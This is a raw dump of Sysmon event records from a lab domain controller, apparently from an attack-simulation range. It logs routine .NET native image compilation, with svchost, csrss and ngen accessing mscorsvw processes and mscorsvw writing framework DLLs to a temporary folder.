10341000x80000000000000006645Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:00.514{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45B4-6000-8502-000000009A01}1636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006644Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:00.483{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45B4-6000-8402-000000009A01}1384C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006643Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:00.468{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-45B4-6000-8402-000000009A01}1384C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006642Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:00.468{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45B4-6000-8402-000000009A01}1384C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006641Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:00.405{08A6967A-45B3-6000-8302-000000009A01}4004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\fa4-0\System.IdentityModel.Services.dll2021-01-14 13:23:00.405 10341000x80000000000000006671Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:01.702{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45B5-6000-8C02-000000009A01}5080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006670Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:01.702{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-45B5-6000-8C02-000000009A01}5080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006669Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:01.702{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45B5-6000-8C02-000000009A01}5080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006668Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:01.561{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45B5-6000-8B02-000000009A01}3052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006667Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:01.546{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-45B5-6000-8B02-000000009A01}3052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006666Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:01.546{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45B5-6000-8B02-000000009A01}3052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006665Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:01.374{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45B5-6000-8A02-000000009A01}4496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006664Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:01.358{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45B5-6000-8A02-000000009A01}4496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006663Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:01.358{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45B5-6000-8A02-000000009A01}4496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006662Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:01.311{08A6967A-45B4-6000-8902-000000009A01}3672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\e58-0\System.IO.Log.dll2021-01-14 13:23:01.311 10341000x80000000000000006685Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:02.811{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45B6-6000-9002-000000009A01}3064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006684Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:02.796{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45B6-6000-9002-000000009A01}3064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006683Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:02.796{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45B6-6000-9002-000000009A01}3064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006682Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:02.718{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45B6-6000-8F02-000000009A01}3048C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006681Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:02.718{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45B6-6000-8F02-000000009A01}3048C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006680Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:02.718{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45B6-6000-8F02-000000009A01}3048C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006679Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:02.640{08A6967A-45B6-6000-8E02-000000009A01}3436C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\d6c-0\System.Messaging.dll2021-01-14 13:23:02.640 10341000x80000000000000006678Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:02.202{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45B6-6000-8E02-000000009A01}3436C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006677Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:02.202{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45B6-6000-8E02-000000009A01}3436C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006676Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:02.202{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45B6-6000-8E02-000000009A01}3436C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006675Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:02.140{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45B6-6000-8D02-000000009A01}5076C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006674Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:02.140{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-45B6-6000-8D02-000000009A01}5076C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006673Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 